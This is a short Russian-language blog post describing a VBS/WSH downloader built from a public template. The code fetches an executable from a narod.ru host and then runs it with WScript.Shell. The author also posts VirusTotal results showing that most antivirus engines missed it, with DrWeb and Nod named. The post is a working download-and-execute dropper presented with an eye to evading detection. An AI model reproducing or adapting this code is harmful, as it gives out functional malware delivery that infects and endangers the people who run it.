ewoke: (Default)
[personal profile] ewoke


Проверяем, как реагируют анти на downloader, писаный на vbs/wsh.
Каркас берется отсюда http://paulsadowski.com/WSH/getremotebinaryfile.htm

Меняем начало на

ImageFile = "get_fs.exe"
DestFolder = ".\"
URL = "
http://dizzie.narod.ru/get_fs.exe"

Дописываем в конец

Set shell = CreateObject("WScript.Shell")
shell.Run "get_fs.exe"

Имеем http://www.virustotal.com/analisis/64d27e639f6e6a453ee051badadeaf0f
(9/37, Drweb и Nod в пролете)

Кто не испугался, получает иконку от экзешника в подарок)

Profile

ewoke: (Default)
ewoke

October 2025

S M T W T F S
   1234
5 67891011
121314 15161718
19202122232425
262728293031 

Most Popular Tags

Style Credit

Expand Cut Tags

No cut tags
Page generated Jun. 20th, 2026 10:33 pm
Powered by Dreamwidth Studios